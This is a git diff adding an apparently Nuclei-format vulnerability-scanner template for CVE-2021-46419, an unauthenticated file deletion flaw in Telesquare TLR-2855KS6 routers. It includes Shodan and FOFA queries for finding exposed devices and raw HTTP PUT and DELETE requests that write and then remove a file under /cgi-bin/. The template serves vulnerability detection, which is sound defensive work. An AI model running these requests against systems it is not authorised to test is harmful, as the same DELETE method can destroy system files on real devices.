diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml new file mode 100644 index 0000000000..348bd77837 --- /dev/null +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-46419 + +info: + name: Telesquare TLR-2855KS6 - Arbitrary File Deletion + author: DhiyaneshDK + severity: critical + description: | + An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts. + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-46419 + - http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.html + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2021-46419 + epss-score: 0.31802 + epss-percentile: 0.96898 + cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: telesquare + product: tlr-2855ks6_firmware + shodan-query: title:"Login to TLR-2855KS6" + fofa-query: product=="TELESQUARE-TLR-2855KS6" + tags: packetstorm,cve,cve2021,telesquare,intrusive + +variables: + filename: "{{rand_base(6)}}" + +http: + - raw: + - | + PUT /cgi-bin/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + DNT: 1 + + {{randstr}} + - | + DELETE /cgi-bin/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + DNT: 1 + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_1 == 201 && status_code_2 == 204' + - 'contains(server_1, "lighttpd")' + condition: and